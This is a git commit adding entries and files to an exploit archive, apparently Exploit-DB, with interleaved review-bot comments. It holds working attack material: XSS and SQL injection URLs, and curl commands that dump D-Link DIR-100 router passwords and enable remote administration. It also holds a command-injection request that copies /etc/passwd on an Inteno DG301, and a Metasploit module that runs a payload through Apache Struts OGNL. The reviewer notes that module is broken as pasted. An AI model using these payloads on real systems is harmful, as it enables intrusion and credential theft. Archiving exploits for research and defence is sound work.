Updated 02_07_2014

Offensive Security 2014-02-07 04:27:24 +00:00
parent 8fb3dea0ad
commit 9f14dc1cba
40 changed files with 2159 additions and 2 deletions


@ -25732,7 +25732,7 @@ id,file,description,date,author,platform,type,port
28713,platforms/php/remote/28713.php,"Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE",2013-10-04,rgod,php,remote,0
28714,platforms/php/webapps/28714.txt,"PHPSelect Web Development Index.PHP3 Remote File Include Vulnerability",2006-09-27,rUnViRuS,php,webapps,0
28716,platforms/php/webapps/28716.txt,"MKPortal 1.0/1.1 PMPopup.PHP Cross-Site Scripting Vulnerability",2006-09-27,HanowarS,php,webapps,0
28718,platforms/freebsd/local/28718.c,"FreeBSD Intel SYSRET Kernel Privilege Escalation Exploit",2013-10-04,CurcolHekerLink,freebsd,local,0
28718,platforms/freebsd/local/28718.c,"FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation Exploit",2013-10-04,CurcolHekerLink,freebsd,local,0
28719,platforms/php/webapps/28719.txt,"VirtueMart Joomla ECommerce Edition 1.0.11 Multiple Input Validation Vulnerabilities",2006-09-27,"Adrian Castro",php,webapps,0
28720,platforms/php/webapps/28720.txt,"Web//News 1.4 Parser.PHP Remote File Include Vulnerability",2006-09-27,ThE-WoLf-KsA,php,webapps,0
28721,platforms/php/webapps/28721.txt,"Red Mombin 0.7 index.php Unspecified XSS",2006-09-22,"Armorize Technologies",php,webapps,0
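Review bot: the 28718 retitle adds the version and a " - " separator ("FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation Exploit"), which matches the "Product Version - Title" form used by the 2014 rows added further down this file (31418 onwards) but not the neighbouring 2013-era rows in this hunk such as 28713 and 28719, so the index now carries two title conventions side by side; acceptable as a targeted fix, but worth deciding on one form before more rows are edited.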
@ -28142,7 +28142,7 @@ id,file,description,date,author,platform,type,port
31326,platforms/php/webapps/31326.txt,"Flyspray 0.9.9 Information Disclosure, HTML Injection, and Cross-Site Scripting Vulnerabilities",2008-03-03,"Digital Security Research Group",php,webapps,0
31327,platforms/multiple/dos/31327.txt,"Borland StarTeam 2008 10.0 .57 - Multiple Remote Vulnerabilities",2008-03-03,"Luigi Auriemma",multiple,dos,0
31328,platforms/php/webapps/31328.txt,"TorrentTrader 1.08 'msg' Parameter HTML Injection Vulnerability",2008-03-03,Dominus,php,webapps,0
31329,platforms/multiple/webapps/31329..txt,"MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)",2014-02-01,@u0x,multiple,webapps,0
31329,platforms/multiple/webapps/31329..txt,"MediaWiki 1.22.1 PdfHandler Remote Code Execution Exploit",2014-02-01,@u0x,multiple,webapps,0
31330,platforms/windows/dos/31330.txt,"Borland VisiBroker Smart Agent 08.00.00.C1.03 - Multiple Remote Vulnerabilities",2008-03-03,"Luigi Auriemma",windows,dos,0
31331,platforms/php/webapps/31331.txt,"PHP-Nuke eGallery 3.0 Module 'pid' Parameter SQL Injection Vulnerability",2008-03-04,"Aria-Security Team",php,webapps,0
31332,platforms/php/webapps/31332.txt,"PHP-Nuke 'Seminars' Module 'fileName' Parameter Local File Include Vulnerability",2008-03-04,The-0utl4w,php,webapps,0
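Review bot: the 31329 retitle drops two useful pieces of information rather than fixing the row: the "<=" that marked 1.22.1 as the upper bound of affected versions, and the CVE-2014-1610 identifier, which is the string most people will search this index for. Both the old and the new line also keep the double dot in the path "platforms/multiple/webapps/31329..txt"; if that is the real filename it should be renamed to 31329.txt in the same commit, and if it is a typo the CSV is pointing at a file that does not exist. Suggest "MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)" with the path corrected.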
@ -28219,3 +28219,42 @@ id,file,description,date,author,platform,type,port
31410,platforms/php/webapps/31410.txt,"Joomla! and Mambo 'com_guide' Component 'category' Parameter SQL Injection Vulnerability",2008-03-17,The-0utl4w,php,webapps,0
31411,platforms/cgi/webapps/31411.txt,"RSA WebID 5.3 'IISWebAgentIF.dll' Cross-Site Scripting Vulnerability",2008-03-17,quentin.berdugo,cgi,webapps,0
31412,platforms/osx/remote/31412.txt,"Apple Mac OS X Server 10.5 Wiki Server Directory Traversal Vulnerability",2008-03-17,"Rodrigo Carvalho",osx,remote,0
31413,platforms/asp/webapps/31413.txt,"Imperva SecureSphere 5.0 Cross-Site Scripting Vulnerability",2008-03-17,Berezniski,asp,webapps,0
31414,platforms/php/webapps/31414.txt,"phpstats 0.1_alpha 'phpstats.php' Cross-Site Scripting Vulnerability",2008-03-18,"Hanno Boeck",php,webapps,0
31415,platforms/php/webapps/31415.txt,"eForum 0.4 'busca.php' Multiple Cross Site Scripting Vulnerabilities",2008-03-18,Omni,php,webapps,0
31416,platforms/php/webapps/31416.txt,"webSPELL 4.1.2 'index.php' Cross-Site Scripting Vulnerability",2008-03-18,n3w7u,php,webapps,0
31418,platforms/php/webapps/31418.txt,"Job Site 1.0 - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80
31419,platforms/php/webapps/31419.txt,"TopicsViewer 3.0 Beta 1 - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80
31420,platforms/php/webapps/31420.txt,"Eventy Online Scheduler 1.8 - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80
31421,platforms/php/webapps/31421.txt,"Booking Calendar - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80
31425,platforms/hardware/webapps/31425.txt,"D-Link DIR-100 - Multiple Vulnerabilities",2014-02-05,"Felix Richter",hardware,webapps,80
31426,platforms/php/webapps/31426.txt,"Plogger 1.0 (RC1) - Multiple Vulnerabilities",2014-02-05,killall-9,php,webapps,80
31427,platforms/php/webapps/31427.txt,"ownCloud 6.0.0a - Multiple Vulnerabilities",2014-02-05,absane,php,webapps,80
31429,platforms/multiple/dos/31429.py,"VLC 2.1.2 (.asf) - Crash PoC",2014-02-05,Saif,multiple,dos,0
31430,platforms/hardware/webapps/31430.txt,"Inteno DG301 - Command Injection",2014-02-05,"Juan J. Guelfo",hardware,webapps,80
31431,platforms/php/webapps/31431.txt,"ImpressCMS 1.3.5 - Multiple Vulnerabilities",2014-02-05,"Pedro Ribeiro",php,webapps,80
31432,platforms/linux/remote/31432.rb,"SkyBlueCanvas CMS Remote Code Execution",2014-02-05,metasploit,linux,remote,0
31433,platforms/multiple/remote/31433.rb,"Apache Tomcat Manager Application Upload Authenticated Code Execution",2014-02-05,metasploit,multiple,remote,80
31434,platforms/java/remote/31434.rb,"Apache Struts Developer Mode OGNL Execution",2014-02-05,metasploit,java,remote,8080
31435,platforms/php/webapps/31435.py,"Joomla JomSocial Component 2.6 - Code Execution Exploit",2014-02-05,"Matias Fontanini",php,webapps,80
31436,platforms/php/webapps/31436.txt,"Pandora FMS 5.0RC1 - Remote Command Injection",2014-02-05,xistence,php,webapps,80
31438,platforms/java/webapps/31438.txt,"IBM Rational ClearQuest 7.0 Multiple Parameters Multiple Cross-Site Scripting Vulnerabilities",2008-03-19,sasquatch,java,webapps,0
31439,platforms/php/webapps/31439.txt,"cPanel 11.18.3 List Directories and Folders Information Disclosure Vulnerability",2008-03-18,Linux_Drox,php,webapps,0
31440,platforms/linux/dos/31440.txt,"Asterisk 1.4.x RTP Codec Payload Handling Multiple Buffer Overflow Vulnerabilities",2008-03-18,"Mu Security research",linux,dos,0
31441,platforms/php/webapps/31441.txt,"MyBlog 1.x SQL Injection and Remote File Include Vulnerabilities",2008-03-19,Cod3rZ,php,webapps,0
31442,platforms/asp/webapps/31442.txt,"Iatek PortalApp 4.0 'links.asp' SQL Injection Vulnerability",2008-03-19,xcorpitx,asp,webapps,0
31443,platforms/php/webapps/31443.txt,"CS-Cart 1.3.2 'index.php' Cross-Site Scripting Vulnerability",2008-03-19,sasquatch,php,webapps,0
31444,platforms/linux/dos/31444.txt,"MySQL <= 5.1.13 INFORMATION_SCHEMA Remote Denial Of Service Vulnerability",2007-12-05,"Masaaki HIROSE",linux,dos,0
31445,platforms/jsp/webapps/31445.txt,"Elastic Path 4.1 manager/getImportFileRedirect.jsp file Parameter Traversal Arbitrary File Access",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0
31446,platforms/jsp/webapps/31446.txt,"Elastic Path 4.1 manager/fileManager.jsp dir Variable Traversal Arbitrary Directory Listing",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0
31447,platforms/php/webapps/31447.txt,"News-Template 0.5beta 'print.php' Multiple Cross Site Scripting Vulnerabilities",2008-03-20,ZoRLu,php,webapps,0
31448,platforms/php/webapps/31448.txt,"Joomla! and Mambo Datsogallery 1.3.1 Component 'id' Parameter SQL Injection Vulnerability",2008-03-20,Cr@zy_King,php,webapps,0
31449,platforms/php/webapps/31449.txt,"W-Agora 4.0 add_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
31450,platforms/php/webapps/31450.txt,"W-Agora 4.0 create_forum.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
31451,platforms/php/webapps/31451.txt,"W-Agora 4.0 create_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
31452,platforms/php/webapps/31452.txt,"W-Agora 4.0 delete_notes.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
31453,platforms/php/webapps/31453.txt,"W-Agora 4.0 delete_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
31454,platforms/php/webapps/31454.txt,"W-Agora 4.0 edit_forum.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
31455,platforms/php/webapps/31455.txt,"W-Agora 4.0 mail_users.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
31456,platforms/php/webapps/31456.txt,"W-Agora 4.0 moderate_notes.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
31457,platforms/php/webapps/31457.txt,"W-Agora 4.0 reorder_forums.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
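Review bot: the four rows credited to "AtT4CKxT3rR0r1ST " (31418 to 31421) carry a trailing space inside the quoted author field, so this author will sort and group separately from the same handle without the space; trim it. The port column is also inconsistent within the new 2014 rows: 31432 (SkyBlueCanvas, an HttpClient module) is listed with port 0 while the other web application entries in the block use 80 and 31434 uses 8080 to match its RPORT default. The rest of the block (ascending IDs, 2014-02-05 dates on the new PoCs, 2008 dates on the SecurityFocus reposts) is consistent with the existing file.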



@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28279/info
Imperva SecureSphere is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Imperva SecureSphere 5.0 MX Management Server is vulnerable.
http://www.example.con/%20<script>alert(window.location=(window.location+"a").slice(0,48)+"view=activateSettingObj&popUpViewRequest=activatePopup&view_func=frameset&view_module=activate_setting");</script>/*.aspx
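Review bot: the proof-of-concept URL on the last line uses the host "www.example.con", which should be "www.example.com" as in the other SecurityFocus reposts in this commit; as written it is a copy-and-paste trap. It would also help to state in the file what the payload does, since the description only says input is not sanitized: the script is injected through the path segment before ".aspx" and rewrites window.location onto the "activateSettingObj" management view.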


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/28315/info
PortalApp is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/path/links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,null,user_name,%205%20,password,null%20FROM%20Users
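Review bot: the injection string hardcodes an eight-column UNION SELECT pulling accesslevel, user_name and password from a Users table, but the file never says which PortalApp version this schema belongs to (the index row says 4.0) or that the column count has to match the original links.asp query; a one-line note on both would make the PoC reusable instead of a single magic URL.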


@ -0,0 +1,198 @@
* Title: Router D-Link DIR-100 Multiple Vulnerabilities
* Date: 2013-09-19
* Author: Felix Richter
* Contact: root@euer.krebsco.de
* Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip
* Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip
* Report Version: 2.0
* Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt
* Vulnerable: D-Link DIR-100
* Hardware Revision: D1
* Software Version: 4.03B07 (from 2012-04-10)
* CVE Numbers:
* CWE-287 Authentication Issues: CVE-2013-7051
* CWE-255 Issues with Credential Management: CVE-2013-7052
* CWE-352 Cross-Site Request Forgery: CVE-2013-7053
* CWE-79 Cross-Site Scripting: CVE-2013-7054
* CWE-200 Information Disclosure: CVE-2013-7055
* Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1
* State: Patched by Vendor
* Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8
# Table of Contents
1. Background
2. Vulnerability Description
3. Technical Description
4. Severity and Remediation
5. Timeline
# 1. Background
The DIR-100 is designed for easy and robust connectivity among heterogeneous
standards-based network devices. Computers can communicate directly with this
router for automatic opening and closing of UDP/TCP ports to take full
advantage of the security provided without sacrificing functionality of on-line
applications.
# 2 Vulnerability Description
Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet
Broadband Router Revision D (and potentially other devices sharing the
affected firmware) that could allow a remote attacker:
- Retrieve the Administrator password without authentication leading to
authentication bypass [CWE-255]
- Retrieve sensitive configuration paramters like the pppoe username and
password without authentication [CWE-200]
- Execute privileged Commands without authentication through a race
condition leading to weak authentication enforcement [CWE-287]
- Sending formatted request to a victim which then will execute arbitrary
commands on the device (CSRF) [CWE-352]
- Store arbitrary javascript code which will be executed when a victim
accesses the administrator interface [CWE-79]
CVE-Numbers for these vulnerabilities has not yet been assigned.
# 3 Technical Description of the Vulnerabilities
## 3.0 The DIR-100 Web Interface and CGI
The DIR-100 Web interface provides a cgi-script on `/cliget.cgi` for
unauthenticated users and `/cli.cgi` for authenticated requests.
list of features provided by each cgi-script can be retrieved by:
curl 'http://192.168.1.104/cliget.cgi?cmd=help'
# and respectively when authenticated
curl 'http://192.168.1.104/cli.cgi?cmd=help'
## 3.1 Authentication Bypass
### Description
The administrator password is not protected in any way on the device, every
attacker with access to the administrator interface which listens on port 80.
For retrieving the Administrator password the request must not be
authenticated.
### Proof of Concept
The web interface provides two distinct ways to retrieve the adminstrator
password:
curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1'
curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary'
## 3.2 Weak Authentication
### Description
As soon as a user is logged into the administration interface, the cli CGI
is `unlocked` and can be used by without authenticating before as
the cgi-script does not check any other authentication parameters such as
cookies or HTTP Parameters. The only access check is if the IP-Address is
the same.
### Proof of Concept
# open the router interface in a web browser and log in
firefox 'http://192.168.0.1/'
# open a new terminal or another web-browser which is currently not logged
# in and try to access
curl 'http://192.168.0.1/cli.cgi?cmd=help'
# this request will be authenticated and it will not be redirected to the
# login page. If no user is logged in, the request will be redirected to
# the login
## 3.3 Retrieve sensitive information
### Description
Besides retrieving the administrator password without authentication it is
possible to retrieve other sensitive configuration from the device as well like
the PPTP and poe Username and Password, as well as the configured dyndns
username and password and configured mail log credentials when these parameters
are configured.
No authentication is requred.
### Proof of Concept
curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd'
## 3.4 Cross-Site Request Forgery (CSRF)
### Description
CSRF attacks can be launched by sending a formatted request to a victim, then
tricking the victim into loading the request (often automatically), which
makes it appear that the request came from the victim. As an example the
attacker could change the administrator password (see Proof of Concept code)
and enable system remote access.
### Proof of Concept
Changing the password for administrator can be done when the ip-address is
authenticated:
# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
# Change password
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin&pass=c%;$sys_passHash=4%25;commit'
# enable remote console
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit'
## 3.5 Cross-Site Scripting (XSS)
### Description
It is possible for an authenticated user to store information on the server
which will not be checked on the server side for special characters which
results in persistent Cross-Site Scripting Vulnerabilities. With this
vulnerabilty the victim (administrator) will run javascript code in the
context of the D-Link DIR-100.
XSS is possible because only on the client side (javascript code) the input is
filtered and validated, sending data directly to the CGI scripts.
### Proof of Concept
# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
# XSS in Static IP Address Tab
curl 'http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=<script>alert(1)</script>%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp='
# XSS in Scheduler tab
curl 'http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=<script>alert(1)</script>%26use=0%26idx=2%26;commit'
# 4 Severity and Remediation
This exploits are considered very critical, especially when the feature of remote
administration is activated on the system.
Weak authentication, together with cross-site request forgery and authentication
bypass can result in a full device compromise from an arbitrary website the victim is
accessing, even if the device has remote administration deactivated on the
internet-port. It is recommended to upgrade the router with the newest firmware
of the D-Link DIR-100.
# 5 Timeline
2013-09-13 - First Contact with D-Link Support
2013-09-19 - Sent Report
2013-10-14 - Request Status update, Response: Beta will be available mid October
2013-12-02 - Vendor publishes Firmware Update
2013-12-11 - Request CVE-IDs
2013-12-18 - Publish the report
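Review bot: section 2 ends with "CVE-Numbers for these vulnerabilities has not yet been assigned." while the header already lists CVE-2013-7051 through CVE-2013-7055 and the timeline records the CVE request on 2013-12-11; the sentence is left over from an earlier report version and should be removed so the file does not contradict itself. Two smaller points: the proof-of-concept commands alternate between 192.168.0.1 and 192.168.1.104 as the router address (sections 3.0 and 3.5 use the latter), which reads as if two devices are involved, and the password-change request in 3.4 sends "pass=c%;$sys_passHash=4%25;commit" with one "%" left unencoded where every neighbouring separator is sent as "%25". The header also dates the report 2013-09-19 while the report itself says it was published 2013-12-18 and the index row says 2014-02-05.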


@ -0,0 +1,110 @@
1. Background
According to the vendor, Inteno DG301 is a high-end Multi-WAN
residential gateway with advanced router and bridge functions.
2. Summary
Inteno DG301 Powered by LuCI Trunk (inteno-1.0.34) and OpenWrt Backfire
10.03.1-RC6 is vulnerable to command injection, which can be exploited
directly from the login form on the web interface.
The vulnerability could be exploited by unauthenticated attackers.
Successful exploitation would allow attackers to execute arbitrary
commands with root privileges.
3. Affected Products
DG301 Powered by LuCI Trunk (inteno-1.0.34) and OpenWrt Backfire
10.03.1-RC6.
Other products or previous versions may also be vulnerable.
4. Vulnerability and Proof of Concept (PoC)
The login form presented on the web administration interface (username
parameter) is vulnerable to command injection, due to the application
does not validate the user input in a proper manner.
The following PoC includes a POST request that should be sent to the
device via web. The request includes a command that will copy the
contents of "/etc/passwd" to a file "test.txt" on the root web folder
were the web administration interface is published.
POST /cgi-bin/luci HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 Gecko/20100101 Firefox
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sysauth=55f19d843ebf2de094b8a8a2acf5c3a7; sysauth=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
username=user`cp%20/etc/passwd%20/www/test.txt`&password=pass
After the request is sent, proceed to visit http://<routerIP>/test.txt.
This should display the contents of "/etc/passwd", including the root
password in encrypted (DES) form. From here, the root credentials could
be cracked in a reasonable amount of time. This attack could also be
used for enabling services (e.g. SSH), or running any other arbitrary
commands.
5. Remediation
The vendor has released a new firmware version - 1.6.8RC3.
Users are encouraged to update their devices in order to patch the
vulnerability.
6. Credit
The vulnerability was originally discovered in an Inteno DG301 device,
by Juan J. Güelfo at Encripto AS.
E-mail: post@encripto.no
Web: http://www.encripto.no
For more information about Encripto's research policy, please visit
http://www.encripto.no/forskning/
7. Timeline
24th of January 2014 - Vulnerabilities discovered by the researcher.
26th of January 2014 - Vulnerability details disclosed to the vendor.
31st of January 2013 - New firmware version launched by the vendor,
which addresses the vulnerability.
3rd of February 2014 - Public disclosure.
8. References
http://www.encripto.no/forskning/whitepapers/Inteno_DG301_advisory_feb_2014.pdf
DISCLAIMER
The material presented in this document is for educational purposes
only. Encripto AS cannot be
responsible for any loss or damage carried out by any technique
presented in this material. The reader is
the only one responsible for applying this knowledge, which is at his /
her own risk.
Any of the trademarks, service marks, collective marks, design rights,
personality rights or similar rights
that are mentioned, used or cited in this document is property of their
respective owners.
Kind regards
*Juan J. Guelfo*
Encripto AS - Information Security
Mailbox 2017, 6028 Aalesund, Norway.
Phone: +47 912 40 380 | www.encripto.no <http://www.encripto.no>
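Review bot: the timeline entry "31st of January 2013 - New firmware version launched by the vendor" is a year typo; the surrounding entries are 2014 and the fix cannot predate the January 2014 discovery. In the PoC request, the Cookie header carries sysauth twice ("sysauth=55f1...; sysauth="), which is noise for an injection that is reached through the unauthenticated login form and should be dropped, and "Content-Length: 60" does not match the 61-byte body shown on the following line; either correct the length or note that the request must be regenerated by the sending tool rather than replayed verbatim.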

platforms/java/remote/31434.rb Executable file

@ -0,0 +1,142 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Struts Developer Mode OGNL Execution',
'Description' => %q{
This module exploits a remote command execution vulnerability in Apache
Struts 2. The problem exists on applications running in developer mode,
where the DebuggingInterceptor allows evaluation and execution of OGNL
expressions, which allows remote attackers to execute arbitrary Java
code. This module has been tested successfully in Struts 2.3.16, Tomcat
7 and Ubuntu 10.04.
},
'Author' =>
[
'Johannes Dahse', # Vulnerability discovery and PoC
'Andreas Nusser', # Vulnerability discovery and PoC
'Alvaro', # @pwntester, 2014's PoC, avoided surname because of the spanish char, sorry about that :\
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2012-0394'],
[ 'OSVDB', '78276'],
[ 'EDB', '18329'],
[ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt' ],
[ 'URL', 'http://www.pwntester.com/blog/2014/01/21/struts-2-devmode/' ]
],
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'Struts 2', { } ]
],
'DisclosureDate' => 'Jan 06 2012',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"])
], self.class)
end
def check
vprint_status("Testing to see if the target can evaluate our Java code...")
addend_one = rand_text_numeric(rand(3) + 1).to_i
addend_two = rand_text_numeric(rand(3) + 1).to_i
sum = addend_one + addend_two
res = execute_command("new java.lang.Integer(#{addend_one}+#{addend_two})")
if res and res.code == 200 and res.body.to_i == sum
return Exploit::CheckCode::Vulnerable
end
if res and res.code == 200 and res.body.to_s =~ /#{sum}/
vprint_status("Code got evaluated. Target seems vulnerable, but the response contains something else:")
vprint_line(res.body.to_s)
return Exploit::CheckCode::Appears
end
return CheckCode::Safe
end
def exploit
@payload_jar = rand_text_alphanumeric(4+rand(4)) + ".jar"
upload_jar
execute_jar
end
def upload_jar
append = 'false'
jar = payload.encoded_jar.pack
chunk_length = 384 # 512 bytes when base64 encoded
while(jar.length > chunk_length)
java_upload_part(jar[0, chunk_length], @payload_jar, append)
jar = jar[chunk_length, jar.length - chunk_length]
append='true'
end
java_upload_part(jar, @payload_jar, append)
end
def java_upload_part(part, filename, append = 'false')
cmd = "#f=new java.io.FileOutputStream('#(unknown)',#{append}),"
cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),"
cmd << "#f.close()"
execute_command(cmd)
end
def execute_jar
cmd = ""
# disable Vararg handling (since it is buggy in OGNL used by Struts 2.1
cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
cmd << "#q.setAccessible(true),#q.set(null,true),"
cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"
cmd << "#q.setAccessible(true),#q.set(null,false),"
# create classloader
cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_jar}').toURI().toURL()}),"
# load class
cmd << "#c=#cl.loadClass('metasploit.Payload'),"
# invoke main method
cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
execute_command(cmd)
end
def execute_command(cmd)
injection = "#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),CMD"
injection.gsub!(/CMD/, cmd)
vprint_status("Attempting to execute: #{cmd}")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s),
'method' => 'GET',
'vars_get' =>
{
'debug' => 'command',
'expression' => injection
}
})
return res
end
end
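Review bot: java_upload_part opens the output as new java.io.FileOutputStream('#(unknown)', ...) instead of interpolating the filename argument it receives, so every chunk is written to a file literally named "#(unknown)" while execute_jar later builds its URLClassLoader from @payload_jar; as pasted, the uploaded jar and the loaded jar are different paths and the exploit cannot work. The line should read "new java.io.FileOutputStream('#{filename}',#{append})". Two smaller points: in check, the fallback branch matches the sum anywhere in the body with /#{sum}/, and with one- to three-digit addends the sum is often a single digit that any HTML page will contain, so the "Appears" verdict means little for small sums (anchor the match or require the body to equal the sum); and the comment "since it is buggy in OGNL used by Struts 2.1" is missing its closing parenthesis, as is the colon in "http//metasploit.com/download" in the header.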


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28296/info
IBM Rational ClearQuest is prone to multiple cross-site scripting vulnerabilities because it fails to adequately sanitize user-supplied input.
An attacker could exploit these vulnerabilities to execute arbitrary local or remote script code in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Ration ClearQuest 2003.06.16, 7.0.0.1, 7.0.0.2, 7.0.1.0, and 7.0.1.1 are vulnerable; other versions may also be affected.
http://www.example.com/cqweb/login?/cqweb/main?command=GenerateMainFrame&service=CQ&schema=SCHEMAHERE"; alert('XSS');//&contextid=DATABASECONTEXTHERE"; alert('XSS');// http://www.example.com/cqweb/login?targetUrl=/cqweb/main?command=GenerateMainFrame&ratl_userdb=DBHERE,&test=&clientServerAddress=http://www.example.com/cqweb/login&username=test</script><script>alert('xss')</script>&password=test&schema=SCHEMAHERE&userDb=DBHERE
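Review bot: "Ration ClearQuest" in the affected-versions line should be "Rational ClearQuest". The last line runs two separate proof-of-concept URLs together (the second starts at "http://www.example.com/cqweb/login?targetUrl=..."), so anyone copying the line gets one broken URL rather than two working ones; put them on separate lines as the other SecurityFocus reposts in this commit do.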

platforms/jsp/webapps/31445.txt Executable file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/28352/info
Elastic Path is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input.
These issues include:
- A local file-include vulnerability.
- An arbitrary file-upload vulnerability.
- A directory-traversal vulnerability.
Note that attackers must be logged into the application to exploit issues.
Exploiting these issues can allow attackers to access potentially sensitive information or to execute arbitrary script code in the context of the webserver process. Other attacks may also be possible.
Elastic Path 4.1 and 4.1.1 are vulnerable; other versions may also be affected.
http://www.example.com/elasticpath_dir/manager/getImportFileRedirect.jsp?type=mapping&file=../../../../../boot.ini
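Review bot: the descriptive text is pasted verbatim from BID 28352 and lists three issue classes (local file include, arbitrary file upload, directory traversal), but this file demonstrates exactly one of them, the traversal through getImportFileRedirect.jsp with file=../../../../../boot.ini; the upload issue has no PoC here or in the companion file 31446. Either trim the list to what this file shows or say explicitly that the upload issue is not covered, so the file does not promise more than it delivers. The index row's title ("file Parameter Traversal Arbitrary File Access") is the accurate description.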

platforms/jsp/webapps/31446.txt Executable file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/28352/info
Elastic Path is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input.
These issues include:
- A local file-include vulnerability.
- An arbitrary file-upload vulnerability.
- A directory-traversal vulnerability.
Note that attackers must be logged into the application to exploit issues.
Exploiting these issues can allow attackers to access potentially sensitive information or to execute arbitrary script code in the context of the webserver process. Other attacks may also be possible.
Elastic Path 4.1 and 4.1.1 are vulnerable; other versions may also be affected.
http://www.example.com/elasticpath_dir/manager/fileManager.jsp?dir=../../../../WINDOWS/system32/config/
